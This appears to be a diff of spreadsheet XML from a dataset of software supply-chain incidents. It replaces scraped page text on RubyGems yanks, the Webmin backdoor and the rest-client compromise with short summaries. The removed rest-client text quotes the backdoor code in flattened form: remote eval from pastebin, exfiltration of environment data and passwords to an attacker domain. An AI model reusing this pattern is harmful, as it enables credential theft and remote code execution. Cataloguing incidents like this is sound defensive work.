'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -3463,18 +3011,17 @@
           <t>RubyGems.org</t>
         </is>
       </c>
-      <c r="C117" t="inlineStr"/>
+      <c r="C117" t="inlineStr">
+        <is>
+          <t>All gems where homografo is the owner were yanked because 168 out of 226 gem names were invalid as per Levenshtein rule.</t>
+        </is>
+      </c>
       <c r="D117" t="inlineStr">
         <is>
           <t>https://gist.github.com/sonalkr132/0af1746c14b42a41e01d20fffbed585b
 https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked</t>
         </is>
       </c>
-      <c r="E117" t="inlineStr">
-        <is>
-          <t>[]</t>
-        </is>
-      </c>
     </row>
     <row r="118">
       <c r="A118" t="inlineStr">
@@ -3489,17 +3036,12 @@
       </c>
       <c r="C118" t="inlineStr">
         <is>
-          <t>download changelog documentation forum january jamie cameron suggest changes page lists problems found webmin usermin versions affected recommended solutions found info found related report securitywebmincom webmin usermin vulnerability http tunnel module webmin lessprivileged webmin user given permission edit configuration http tunnel module heshe could introduce vulnerability captures cookies belonging webmin users module thanks black menace pybro reporting issue html email crafted attacker could capture browser cookies opened thanks ly1g3 reporting webmin privilege escalation exploit cve202230708 less privileged webmin users excluding created virtualmin cloudmin modify arbitrary files root privileges commands root systems additional untrusted webmin users upgrade immediately thanks esp0xdeadbeef v1s3r1on finding reporting issue webmin file manager privilege exploit cve20220824 cve20220829 less privileged webmin users file manager module restrictions configured access files root privileges using default authentic theme systems additional untrusted webmin users upgrade immediately note virtualmin systems effected domain owner webmin users configured thanks faisal faisalfs10x netbytesec finding reporting issue virtualmin procmail wrapper version privilege escalation exploit version procmailwrapper package installed virtualmin vulnerability used anyone access gain root privileges prevent virtualmin users upgrade version later immediately webmin vulnerabilities webmin installed using setuppl script cve202131760 cve202131761 cve202131762 webmin installed using nonrecommended setuppl script checking unknown referers enabled default opens system csrf attacks using malicious links fortunately standard packages script vulnerable install using setuppl script vulnerability fixed adding line referersnone1 etcwebminconfig file thanks meshal mesh3l911 mesh3l911 mohammed z0ldyck electronicbots finding reporting issue webmin vulnerability command shell module cve20208820 cve20208821 user privileges create custom commands could exploit users unescaped html thanks mauro caseres reporting following issue webmin vulnerability read mail module cve202012670 saving malicious html attachment could trigger vulnerability webmin remote command execution cve201915231 webmin releases versions contain vulnerability allows remote command execution version vulnerable default install upgraded immediately versions vulnerable changing expired passwords enabled case default either upgrading version strongly recommended alternately running versions edit etcwebminminiservconf remove passwdmode line etcwebminrestart command details webmin version released backdoor could allow anyone knowledge execute commands root versions also contained backdoor using similar code exploitable default webmin install admin enabled feature webmin webmin configuration authentication allow changing expired passwords could used attacker neither accidental bugs rather webmin source code maliciously modified nonobvious vulnerability appears happened follows time april webmin development build server exploited vulnerability added passwordchangecgi script timestamp file back show diffs included webmin release vulnerable file reverted checkedin version github sometime july file modified attacker however time exploit added code executed changing expired passwords enabled included webmin release september 10th vulnerable build server decomissioned replaced newly installed server running centos however build directory containing modified file copied across backups made original server august 17th informed 0day exploit made vulnerability released response exploit code removed webmin version created released users order prevent similar attacks future we’re following updating build process checkedin code github rather local directory kept sync rotated passwords keys accessible build system auditing github commits past year look commits introduced similar vulnerabilities webmin remote command execution metasploit workable exploit requires attacker already know root password hence webmin webmin malicious http headers downloaded urls upload download file manager module used fetch untrusted webmin user downloads file malicious http headers returned used exploit vulnerability thanks independent researcher john page hyp3rlinx reported vulnerability beyond security’s securiteam secure disclosure program webmin authentic theme configuration page vulnerability issue system untrusted users webmin access using authentic theme nonroot webmin user could theme configuration page execute commands root authentic theme remote access vulnerability authentic theme enabled globally attacker could execute commands remotely root long firewall blocking access webmin’s port webmin crosssite scripting vulnerability xmlrpccgi script cve20151990 malicious website could create links javascript referencing xmlrpccgi script triggered user logged webmin visits attacking site thanks peter allor finding reporting issue webmin read mail module vulerable malicious links untrusted users access ability read user mail module case virtualmin domain owners malicious link could created allow reading file system even owned root thanks patrick william rack911 labs finding webmin shellshock vulnerability bash shell vulnerable shellshock exploited attackers webmin login arbitrary commands root updating version updating bash issue webmin crosssite scripting hole malicious website could create links javascript referencing file manager module allowed execution arbitrary commands webmin website viewed victim cert vulnerability note vu788478 details thanks jared allar american information group reporting problem referer checks don’t include port attacker control httpexamplecom heshe could create page malicious javascript could take webmin session httpsexamplecom10000 httpexamplecom viewed victim thanks marcin teodorczyk finding issue webmin crosssite scripting hole vulnerability triggered attacker changes unix username tool like chfn page listing usernames viewed root user webmin thanks javier bassi reporting virtualmin unsafe file writes virtualmin allows virtual server owner read write arbitrary files system creating malicious symbolic links virtualmin perform operations links upgrading version strongly recommended system untrusted domain owners webmin usermin crosssite scripting hole attack could open users visit untrusted websites webmin open browser session cookie captured could allow attacker login webmin without password quick webmin configuration module click trusted referers icon referrer checking enabled uncheck trust links unknown referrers webmin usermin make settings defaults webmin windowsonly command execution user logged webmin execute command using special parameters could used lessprivileged webmin users raise level access thanks keigo yamazaki little earth corporation finding webmin usermin pamlogincgi script malicious link webmin pamlogincgi script used execute javascript within webmin server context perhaps steal session cookies webmin usermin choosercgi script using webmin usermin browse files system created attacker specially crafted filename could used inject arbitrary javascript browser webmin usermin remote source code access attacker view source code webmin perl programs using specially crafted source code webmin freely available issue concern sites custom modules want source remain hidden makes similar technique craft allow arbitrary javascript executed user’s browser malicious link clicked thanks keigo yamazaki little earth corporation finding webmin usermin artbitrary remote file access attacker without login webmin read contents file server using specially crafted users upgrade version soon possible setup access control webmin thanks kenny chen bringing attention webmin windows artbitrary file access running webmin windows attacker remotely view contents file system using specially crafted affect operating systems webmin windows upgrade version later thanks keigo yamazaki little earth corporation discovering webmin usermin perl syslog input attack logging failing login attempts syslog enabled attacker crash possibly take webmin webserver unchecked input passed perl’s syslog function upgrading latest release webmin recommended thanks jack dyad reporting problem webmin usermin full conversations’ mode remote attack affects systems option support full conversations enabled webmin webmin configuration authentication page option enabled webmin usermin attacker gain remote access webmin without needing supply valid login password fortunately option enabled default rarely used unless setup requires username password upgrading advised anyway thanks keigo yamazaki little earth corporation jpcertcc discovering notifying webmin usermin brute force password guessing attack prior webmin usermin versions password timeouts turned default attacker every possible password root admin user heshe finds correct solution enable password timeouts repeated attempts login user become progressively slower done following steps webmin configuration module click authentication icon select enable password timeouts button click save button bottom page problem also present usermin prevented following steps usermin configuration module webmin usermin vulnerability viewing html email several potentially dangerous types urls passed used perform malicious actions like executing commands loggedin usermin user module configurations visible even webmin user access module heshe still view it’s module config page entering calls configcgi module name parameter account lockout attack sending specially constructed password attacker lock users password timeouts enabled webmin</t>
+          <t>An unknown hacker injected a backdoor that allowed for execution of arbitrary commands as root into Webmin 1.890 through 1.921 by modifying a source file on the development build server.</t>
         </is>
       </c>
       <c r="D118" t="inlineStr">
         <is>
           <t>http://webmin.com/exploit.html</t>
-        </is>
-      </c>
-      <c r="E118" t="inlineStr">
-        <is>
-          <t>['changelog', 'documentation', 'change', 'page', 'list', 'problem', 'usermin', 'version', 'solution', 'info', 'related', 'report', 'vulnerability', 'http', 'tunnel', 'module', 'webmin', 'user', 'permission', 'configuration', 'http', 'tunnel', 'vulnerability', 'cookie', 'webmin', 'user', 'module', 'thank', 'black', 'menace', 'pybro', 'reporting', 'issue', 'email', 'attacker', 'cookie', 'thank', 'privilege', 'escalation', 'cve202230708', 'privileged', 'webmin', 'user', 'virtualmin', 'cloudmin', 'arbitrary', 'file', 'root', 'privilege', 'root', 'system', 'additional', 'untrusted', 'webmin', 'user', 'thank', 'reporting', 'issue', 'webmin', 'file', 'manager', 'privilege', 'cve20220824', 'privileged', 'webmin', 'user', 'file', 'manager', 'module', 'restriction', 'access', 'file', 'root', 'privilege', 'default', 'authentic', 'theme', 'system', 'additional', 'untrusted', 'webmin', 'user', 'virtualmin', 'system', 'domain', 'owner', 'user', 'thank', 'issue', 'virtualmin', 'privilege', 'escalation', 'version', 'procmailwrapper', 'package', 'virtualmin', 'vulnerability', 'access', 'gain', 'root', 'privilege', 'virtualmin', 'user', 'version', 'script', 'cve202131761', 'cve202131762', 'script', 'unknown', 'referer', 'default', 'system', 'attack', 'malicious', 'link', 'standard', 'package', 'script', 'vulnerable', 'install', 'script', 'vulnerability', 'line', 'file', 'thank', 'meshal', 'reporting', 'issue', 'webmin', 'vulnerability', 'command', 'shell', 'module', 'cve20208820', 'user', 'privilege', 'custom', 'command', 'user', 'issue', 'webmin', 'vulnerability', 'mail', 'module', 'malicious', 'html', 'attachment', 'vulnerability', 'webmin', 'remote', 'command', 'execution', 'webmin', 'release', 'version', 'vulnerability', 'remote', 'command', 'execution', 'version', 'vulnerable', 'default', 'install', 'version', 'vulnerable', 'password', 'case', 'default', 'version', 'version', 'passwdmode', 'line', 'command', 'detail', 'version', 'backdoor', 'knowledge', 'command', 'root', 'version', 'backdoor', 'similar', 'code', 'exploitable', 'default', 'feature', 'configuration', 'authentication', 'expired', 'password', 'attacker', 'accidental', 'bug', 'source', 'code', 'nonobvious', 'vulnerability', 'time', 'development', 'build', 'server', 'vulnerability', 'passwordchangecgi', 'script', 'timestamp', 'file', 'show', 'diff', 'vulnerable', 'file', 'checkedin', 'version', 'sometime', 'file', 'attacker', 'time', 'code', 'password', 'webmin', 'release', '10th', 'vulnerable', 'build', 'server', 'server', 'running', 'cento', 'directory', 'file', 'backup', 'original', 'server', '17th', 'vulnerability', 'response', 'code', 'webmin', 'version', 'user', 'order', 'similar', 'attack', 'future', 'build', 'process', 'code', 'local', 'directory', 'sync', 'password', 'key', 'accessible', 'build', 'system', 'past', 'year', 'commit', 'similar', 'vulnerability', 'webmin', 'remote', 'command', 'execution', 'metasploit', 'workable', 'exploit', 'attacker', 'root', 'password', 'malicious', 'header', 'url', 'download', 'file', 'manager', 'module', 'fetch', 'untrusted', 'user', 'download', 'malicious', 'http', 'header', 'vulnerability', 'thank', 'independent', 'researcher', 'vulnerability', 'security', 'securiteam', 'secure', 'disclosure', 'program', 'webmin', 'authentic', 'theme', 'configuration', 'page', 'vulnerability', 'issue', 'system', 'untrusted', 'user', 'webmin', 'access', 'authentic', 'theme', 'user', 'configuration', 'page', 'command', 'authentic', 'theme', 'remote', 'access', 'vulnerability', 'authentic', 'theme', 'attacker', 'command', 'long', 'firewall', 'access', 'port', 'webmin', 'scripting', 'vulnerability', 'xmlrpccgi', 'script', 'cve20151990', 'malicious', 'website', 'link', 'script', 'user', 'visit', 'site', 'reporting', 'issue', 'mail', 'module', 'vulerable', 'malicious', 'link', 'untrusted', 'user', 'access', 'ability', 'user', 'mail', 'module', 'case', 'virtualmin', 'domain', 'owner', 'malicious', 'link', 'reading', 'file', 'system', 'root', 'webmin', 'shellshock', 'vulnerability', 'bash', 'shell', 'vulnerable', 'shellshock', 'attacker', 'login', 'arbitrary', 'command', 'version', 'bash', 'issue', 'webmin', 'scripting', 'hole', 'malicious', 'website', 'link', 'file', 'manager', 'module', 'execution', 'arbitrary', 'command', 'website', 'victim', 'cert', 'vulnerability', 'note', 'detail', 'thank', 'group', 'problem', 'referer', 'check', 'port', 'attacker', 'page', 'malicious', 'javascript', 'webmin', 'session', 'victim', 'thank', 'teodorczyk', 'issue', 'webmin', 'scripting', 'hole', 'vulnerability', 'attacker', 'unix', 'username', 'tool', 'page', 'listing', 'username', 'root', 'user', 'unsafe', 'file', 'virtualmin', 'virtual', 'server', 'owner', 'arbitrary', 'file', 'system', 'malicious', 'symbolic', 'link', 'operation', 'link', 'version', 'system', 'untrusted', 'domain', 'owner', 'scripting', 'hole', 'attack', 'user', 'untrusted', 'website', 'webmin', 'open', 'attacker', 'login', 'webmin', 'password', 'quick', 'webmin', 'configuration', 'module', 'click', 'referer', 'icon', 'checking', 'trust', 'link', 'unknown', 'make', 'setting', 'command', 'execution', 'user', 'command', 'special', 'parameter', 'webmin', 'user', 'level', 'access', 'thank', 'malicious', 'link', 'javascript', 'server', 'context', 'session', 'cookie', 'usermin', 'browse', 'file', 'system', 'attacker', 'filename', 'inject', 'arbitrary', 'code', 'access', 'attacker', 'view', 'source', 'code', 'perl', 'program', 'source', 'code', 'webmin', 'available', 'issue', 'concern', 'site', 'custom', 'module', 'source', 'hidden', 'similar', 'technique', 'craft', 'arbitrary', 'javascript', 'user', 'link', 'thank', 'artbitrary', 'remote', 'file', 'access', 'attacker', 'content', 'file', 'server', 'user', 'version', 'possible', 'setup', 'access', 'control', 'attention', 'webmin', 'window', 'file', 'access', 'attacker', 'content', 'file', 'system', 'operating', 'system', 'webmin', 'window', 'version', 'thank', 'corporation', 'syslog', 'input', 'attack', 'login', 'syslog', 'attacker', 'crash', 'webmin', 'webserver', 'unchecked', 'input', 'perl', 'syslog', 'function', 'late', 'release', 'webmin', 'problem', 'full', 'conversation', 'mode', 'remote', 'attack', 'system', 'option', 'full', 'conversation', 'configuration', 'authentication', 'page', 'option', 'remote', 'access', 'webmin', 'supply', 'valid', 'login', 'password', 'option', 'default', 'setup', 'username', 'password', 'upgrading', 'thank', 'corporation', 'force', 'password', 'attack', 'version', 'password', 'timeout', 'default', 'attacker', 'possible', 'password', 'correct', 'solution', 'enable', 'password', 'timeout', 'attempt', 'login', 'user', 'step', 'webmin', 'configuration', 'module', 'click', 'authentication', 'icon', 'select', 'enable', 'password', 'timeout', 'button', 'click', 'save', 'button', 'bottom', 'page', 'problem', 'usermin', 'step', 'usermin', 'configuration', 'module', 'vulnerability', 'html', 'several', 'dangerous', 'type', 'url', 'malicious', 'action', 'command', 'loggedin', 'user', 'module', 'configuration', 'visible', 'webmin', 'user', 'access', 'module', 'config', 'page', 'call', 'configcgi', 'module', 'name', 'parameter', 'account', 'lockout', 'attack', 'password', 'attacker', 'user', 'password', 'timeout', 'webmin']</t>
         </is>
       </c>
     </row>
@@ -3516,17 +3058,12 @@
       </c>
       <c r="C119" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert restclient restclient public notifications fork star code issues pull requests actions projects wiki insights additional navigation options code issues pull requests actions projects wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom cve201915224 version published malicious backdoor open tasks juskoljo opened issue comments open tasks cve201915224 version published malicious backdoor juskoljo opened issue comments assignees labels comments copy link juskoljo commented edited summary august attackers published series restclient versions using credentials restclient maintainer whose rubygemsorg account compromised affected versions downloaded small number times august juskoljo observed malicious version created issue later rubygems team yanked offending version locked affected maintainers account several gems similarly affected httpsgithubcomrubygemsrubygemsorgwikigemsyankedandaccountslocked19aug2019 released version identical version order supersede affected versions legacy series checking dependencies versions unaffected impact malicious backdoor version would activate rails installations railsenv started production would download code pastebincom execute pastebin gone reportedly phoned home execute instructions mironanoruzzzcomua also disappeared reportedly used mine cryptocurrency could used purpose restclient users affected series superseded users updated last week could affected rails production environments search gemfilelock files containing malicious versions find grep command useful dirtosearch grep includegemfilelock restclient remediation restclient maintainers take number steps response incident first released version users reason unable upgrade modern version restclient confidence bundle update second establish practices expect maintainers enabling twofactor authentication rubygemsorg accounts available since last year third seek adopt policies maintainer activity continuity ideally seek active maintainers latest release prior today surprise restclient several maintainers active many years rubygemsorg team also process making number upstream improvements response increasing prevalence attacks targeting popular open source libraries include adding show specific user pushed yanked given release adding email notifications owners pushes currently disabled using free email provider plan validating passwords list known compromised passwords progress work progress make contributions httpsgithubcomrubygemsrubygemsorg references cve201915224 original report follows seems restclient uploaded rubygemsorg review seems latest version evaluate remote code pastebincom sends information mironanoruzzzcomua requestrb begin yield rescue exception thread loop sleep eval open httpspastebincomraw5indelnx read rails code pastebincom unless urlhost include localhost unless defined require openssl require base64 publickey openssl pkey read base64 urlsafedecode64 ls0tls1crudjtibqvujmsumgs0vzls0tls0ktuljqklqqu5cz2txagtprzl3mejbuuvgqufpq0froefnsulcq2dlq0frruf2u3ldwujiuunsbtn4a21hmitrnwpsrjd5r1rxnzzomvlrne1qshlnemhhdguxqitdl1jqwjexbmu1wjbamjhdk0vnwfvpwhrltfljmlf6yk5vbmrlcmtvsuh3dwtzz0hlwtrcl1u5ogi5ugjnzexozjftz25uynppvwhiyufxqtb3r3rwl0ppqknqc2taqkh4otvlzgmkbmg0ccthctm5zlowemtfduhyuus0tu9urkjlagjielhcbmhpajhvu0nurhbjbjjea1lir3lbcmpgb0jftzq4zaphtklnslazqurpu1lym2hmvmfoytjcs0xzcnczwgfomzfmogh0u1dqnklbmtlqry9wbvlqk2fbn0zubwywvhjdcjnnbgxrnfrrswp6rvdhvud5wklvce9zzkvweitwtdn0vdf1tdczdzvwa2npu1mwajz3cvq5ckkry2hhwxjjzegkrffjrefrquikls0tls1ftkqgufvcteldietfws0tls0tcg rack sendfile prepend module definemethod call signature payload httpcookie match session split signature base64 urlsafedecode64 signature payload base64 urlsafedecode64 payload publickey verify openssl digest sha256 signature payload payload json parse payload time payload timestamp eval payload ruby super unless urlhost include localhost unless defined faraday post httpmironanoruzzzcomua urlhost tohash toyaml urlhost urlhost urlhost length unless defined kgibwb3l module authenticate password kgibwb3l email password rescue super identity prepend loop break kgibwb3l empty kgibwb3l faraday post httpmironanoruzzzcomua urlhost jussi text updated successfully errors encountered motoyasusaburi lafeber d4rkypl khalilovcmd mtam2 psruby feliperaul anonoz cooljacob204 rtdp reacted thumbs emoji dmuth faqndo97 albab devlim vrinek reacted confused emoji jannewaren agungyuliaji ohbarye hasumikin nurse nahi citystar hkdnet skinofstars kachick reacted eyes emoji reactions reactions reactions reactions mentioned issue malware miner gems rubygemsrubygemsorg2097 closed copy link lingfennan commented juskoljo good catch record requested incident crediting reporter update issued notice restclient downloads hopefully help notify issue juskoljo motoyasusaburi pbellon thedrow nfedyashev dowwie thefury forestjay henrytseng rmetzler reacted thumbs emoji reactions reactions sorry something went wrong copy link sonalkr132 commented yanked pusher account mwmanning locked juskoljo drenmi raou1d cooljacob204 thedrow rafaelmcarvalho ajedi32 worknate bronzdoc itzlevvie reacted thumbs emoji reactions reactions sorry something went wrong copy link member mattmanning commented sorry everyone looks like rubygems account compromised juskoljo pxlpnk looneym alexanderadam dcsaszar longkt90 rdeckard atostivint mtarnovan rtdp reacted thumbs emoji kissu asumagic rnevius nmaraston timoroth salzig mrvdh mpxc8102 thbp hazana reacted thumbs emoji cprodhomme kissu forresty asumagic rdeckard atostivint tceduard sa7mon kryan90 unixlab reacted confused emoji ejacobs pieterlange justincampbell anarcat andyzickler r167 reacted heart emoji nbrien reacted rocket emoji hazana lfv89 dnguyenchevy colincromar ekuiter jeremycarbonne holyketzer reacted eyes emoji reactions reactions reactions reactions reactions reaction reactions sorry something went wrong copy link shoh commented yanked version httpsrubygemsorggemsrestclientversions affected august 114kb yanked august 113kb yanked august 113kb yanked august 115kb yanked reactions sorry something went wrong shoh mentioned issue cve201915224 restclient rubysecrubyadvisorydb405 merged copy link chloerei commented maintainers please setting multifactor authentication httpsguidesrubygemsorgsettingupmultifactorauthentication johnsyweb raou1d glaucocustodio isaced kiall ruprict kramer33 btrd luisibaja3 tceduard reacted thumbs emoji chazanov reacted thumbs emoji devlim reacted rocket emoji harrynewsome reacted eyes emoji reactions reactions reaction reaction reaction sorry something went wrong copy link jandintel commented case people need write detailed report company might help consisted following sent infected host attacker sent environment variables infected host attacker depending setup include credentials services database payment service provider allowed eval ruby code infected host attacker needed send signed using attacker’s cookie ruby code overloaded authenticate method identity class every time method gets called send emailpassword attacker however unsure libraries identity class though maybe someone else knows sleeplessbyte npras 007lva vjdhama bdewater rdeckard btrd danielgilbert kozmic ageitgey reacted thumbs emoji reactions reactions sorry something went wrong copy link mensfeld commented edited code diff hijacked available httpsdiffcoditsuiodiffs7b368951323a42b9b2ed15da4ed4f17c reactions sorry something went wrong copy link ssaunier commented edited find project impacted figured could useful others code projects live grep include gemfilelock restclient nothing gets printed means latest working branch projects safe might different running production dont provide guarantee otherwise itll tell projects compromised attention jandintel message might need update variables credentials passwords btrd maximeg unixlab gravitystorm ctres mcls draiken chucknelson landonwilkins burakson reacted thumbs emoji michaelpaddle reacted thumbs emoji michaelpaddle albab reacted confused emoji alexbenoit mappingvermont shanesveller ruanltbg reacted rocket emoji devlim reacted eyes emoji reactions reactions reaction reactions reactions reaction sorry something went wrong copy link opakalex commented love chazanov juskoljo nfedyashev dgtlmoon reacted thumbs emoji oskarpearson timoroth narkoz ervamate victoriastuart julienbourdeau reacted thumbs emoji opakalex reacted heart emoji reactions reactions reactions reaction sorry something went wrong copy link wrren commented definitive list affected versions aqabawe bplunkert dgtlmoon reacted thumbs emoji reactions reactions sorry something went wrong copy link samgranieri commented here’s proposal make mandatory ssaunier caendekerk jonathanmarvens tweedge patveith nfedyashev paulsec cdolan villesinisalo scottillogical reacted thumbs emoji chazanov rubyfeedback reacted thumbs emoji harrynewsome reacted eyes emoji reactions reactions reactions reaction sorry something went wrong copy link chazanov commented here’s proposal make mandatory make many ukrainian families starve finsterdexter reshiire lonnv gerpsh vstetsyshyn hcoa grahamc nfedyashev johnli xnymia reacted thumbs emoji yacinemtb mpxc8102 fatcatt316 chschlue vemv ondrek sergeypapyan reacted laugh emoji idisposable reacted hooray emoji mvlabat smostovoy anujku reacted confused emoji vincentclee reacted rocket emoji charlyjazz reacted eyes emoji reactions reactions reactions reaction reactions reaction reaction sorry something went wrong copy link landswellsong commented notallukrainians vstetsyshyn nfedyashev serhiibudnik aqabawe pedrocarrico milt lfuelling itzlevvie akorzeniowski toverux reacted thumbs emoji victoriastuart rubyfeedback railsler reacted thumbs emoji vincentclee reacted rocket emoji reactions reactions reactions reaction sorry something went wrong copy link jonathanmarvens commented samgranieri agreed probably make suggestion directly rubygems samgranieri xnymia anupamaagarwal montch itzlevvie reacted thumbs emoji rubyfeedback reacted thumbs emoji samgranieri reacted heart emoji reactions reactions reaction reaction sorry something went wrong copy link chazanov commented notallukrainians course ukrainians hacker could also russian definitely true moneydriven hacking malware distributes wealth centres capitalism edges nfedyashev golonzovsky nazarik pedrocarrico bplunkert timkraemer schweinepriester skoddowl dimasmagulov msdundar reacted thumbs emoji vincentclee reacted rocket emoji reactions reactions reaction sorry something went wrong copy link landswellsong commented chazanov sorry include smiley next time write ironic comment jfdhuiz reacted thumbs emoji victoriastuart walkerab reacted thumbs emoji reactions reaction reactions sorry something went wrong copy link opakalex commented make versions nothing merge auto guys thanks hackers really show stupid system think olegsmelov pedrocarrico pcarn ervamate wjessop victoriastuart btrd driverdan mikebailey reacted thumbs emoji reactions reactions sorry something went wrong copy link rietta commented quick scan gemfilelock files checked system works linux find name gemfilelock exec grep restclient nfedyashev pedrocarrico rylanb jsugarman victoriastuart mattmanning mikebailey reacted thumbs emoji michaelpaddle reacted eyes emoji reactions reactions reaction sorry something went wrong fabdbt pushed commit seniormediapolrruby referenced issue patch restclientrestclient713 using restclient rubocop b36f019 …fix tests copy link karlyan17 commented notallukrainians ukraine best ukraine euwest victoriastuart joshfoskett rubyfeedback mikebailey devlim reacted thumbs emoji reactions reactions sorry something went wrong copy link and0x000 commented please release clean version greatly help people sort automatic update procedure branch automatically receive noninfected version nfedyashev plentz sjuxax rietta zaidakram btrd itzlevvie brandonbrowning fatcatt316 rubyfeedback reacted thumbs emoji michaelpaddle reacted eyes emoji reactions reactions reaction sorry something went wrong copy link nfedyashev commented opakalex make versions nothing merge auto guys thanks hackers really show stupid system think mattmanning explained issue caused compromised rubygems account wasnt merged automatically pull request released version make versions nothing restclient user cant blame would agree releases significant updates users real pain time needed reviewing changelogs reactions sorry something went wrong copy link opakalex commented nfedyashev mean people turn auto updates merges stupid sorry good happens need push updates versions reactions sorry something went wrong copy link nfedyashev commented opakalex sorry misunderstood point totally agree automatically update latest version crazy dgtlmoon reneweteling reacted thumbs emoji reactions reactions sorry something went wrong referenced enable rubygem owners noredinkrailsedgetest20 closed rubyems noredinkfirstaftercreatedat5 closed enable noredinklivefixtures32 open enable rubygems alexfarrillcapistranomysqldump13 closed referenced enable rubygems paulcaconfigurableengine40 closed enable rubygems noredinkrspecretry104 closed copy link mensfeld commented opakalex introduce policy reviewing releases projects differ mentioned coditsu almost done bundler plugin make mandatory reviewing piece cake reactions sorry something went wrong copy link opakalex commented coditsu mensfeld reactions sorry something went wrong copy link mensfeld commented edited opakalex partially soon fully quality tools ruby wrapped docker container require permanent access heres example httpsappcoditsuiokarafkabuildscommitbuilds10a892f5aef649c6ba29e2362b841c90validations pings deprecations without bundling allows review approve reject version plugin take votes organisation block installing deps werent reviewied especially upgrading httpsappcoditsuiokarafkabuildsvalidationsb689b02836ef4ed9a498347c2da2b25boffenses want early access collect data requires code access work reactions sorry something went wrong copy link hanmac commented wonder someone something would download infected gems available since reactions sorry something went wrong copy link opakalex commented thanks prefere check source code update easy tool hacked fools like right never mensfeld trust external checks sorry kwerle sirbranedamuj albab reacted thumbs emoji reactions reactions sorry something went wrong copy link mensfeld commented opakalex course hacked thats slowly released internally thing required ability receive rubygems webhooks updates reactions sorry something went wrong copy link mensfeld commented wonder someone something would download infected gems available since legacy reactions sorry something went wrong copy link shanesveller commented mattmanning please lock thread maintainers think course productive conversation colincromar rmetzler btrd zjwhitehead fizvlad kwerle agrare maurooto reneklacan raybaxter reacted thumbs emoji michaelpaddle nfedyashev reacted thumbs emoji reactions reactions reactions sorry something went wrong copy link opakalex commented mensfeld linux grep space program moon program done people brain modern tools shit ocean stop produce shit easy never projects easy dont gems kwerle cyc115 presidentbeef tkrajcar albab reacted thumbs emoji reactions reactions sorry something went wrong copy link michaelpaddle commented please note grep command searching installs seem work based test file created follows echo restclient gemfilelock following command found file sudo grep includegemfilelock restclient devnull reactions sorry something went wrong copy link mats852 commented love great terrible btrd virtuexru reacted thumbs emoji johnduhart peterkrieg korranpl bspellacy reacted laugh emoji vincentclee reacted rocket emoji reactions reactions reactions reaction sorry something went wrong copy link michaelpaddle commented following suggestion and0x000 encourage autoupdates sign left machine show infected otherwise people wont know cleanupchange passwordsrotate credentials nfedyashev reacted heart emoji reactions reaction sorry something went wrong copy link danfinlay commented similar event happened ecosystem year favorite takeaway blog post’s httpslinkmediumcomvmrxqstgjz even even review code hacks obscured hacks happen limit possible impacts dependency hacked joepie91 reacted thumbs emoji reactions reaction sorry something went wrong copy link opakalex commented similar event happened ecosystem year favorite takeaway blog post’s httpslinkmediumcomvmrxqstgjz even even review code hacks obscured hacks happen limit possible impacts dependency hacked braine development youtube instagram easy btrd phuongdh justincampbell leexgreen kwerle hoffa maurooto driverdan mikebailey shanesveller reacted thumbs emoji kovetskiy reacted rocket emoji reactions reactions reaction sorry something went wrong copy link mikebailey commented even even review code hacks obscured hacks happen limit possible impacts dependency hacked amongst major structural things like sandboxing youre logging work callouts ukranian domains zero business indicator reactions sorry something went wrong copy link vanuan commented looks like targeted attack quite list dependants version mikebailey nfedyashev averell23 reacted thumbs emoji reactions reactions sorry something went wrong copy link vanuan commented edited maybe worth releasing additional version would raise installation error point users issue doubt risk breaking stuff users greater risk compromise graphman65 reacted thumbs emoji reactions reaction sorry something went wrong restclient locked limited conversation collaborators copy link member commented thank lively discussion well return relevant follow reactions sorry something went wrong changed title warning restclient hijacked cve201915224 version published malicious backdoor added label selfassigned copy link member commented posted following restclient email announcement list httpsrestclientgroupsiogmainmessage325 august attackers published series restclient versions using credentials restclient maintainer whose rubygemsorg account compromised affected versions downloaded small number times august jussi koljonen observed malicious version created issue later rubygems team yanked offending version locked affected maintainers account several gems similarly affected httpsgithubcomrubygemsrubygemsorgwikigemsyankedandaccountslocked19aug2019 malicious backdoor version would activate rails installations railsenv started production would download code pastebincom execute pastebin gone reportedly phoned home execute instructions mironanoru also disappeared reportedly used mine cryptocurrency could used purpose restclient users affected series superseded users updated last week could affected rails production environments search gemfilelock files containing malicious versions find grep command useful dirtosearch grep includegemfilelock restclient restclient maintainers take number steps response incident first released version users reason unable upgrade modern version restclient confidence bundle update second establish practices expect maintainers enabling twofactor authentication rubygemsorg accounts available since last year third seek adopt policies maintainer activity continuity ideally seek active maintainers latest release prior today surprise restclient several maintainers active many years rubygemsorg team also process making number upstream improvements response increasing prevalence attacks targeting popular open source libraries include adding show specific user pushed yanked given release adding email notifications owners pushes currently disabled using free email provider plan validating passwords list known compromised passwords progress work progress make contributions httpsgithubcomrubygemsrubygemsorg thanks patience support andy references cve201915224 reactions sorry something went wrong sign free subscribe conversation github already account sign assignees labels projects none milestone milestone development branches pull requests participants others footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>The RubyGems.org account of the rest-client RubyGem creator was compromised and a malicious payload was added to a new version.</t>
         </is>
       </c>
       <c r="D119" t="inlineStr">
         <is>
           <t>https://github.com/rest-client/rest-client/issues/713</t>
-        </is>
-      </c>
-      <c r="E119" t="inlineStr">
-        <is>
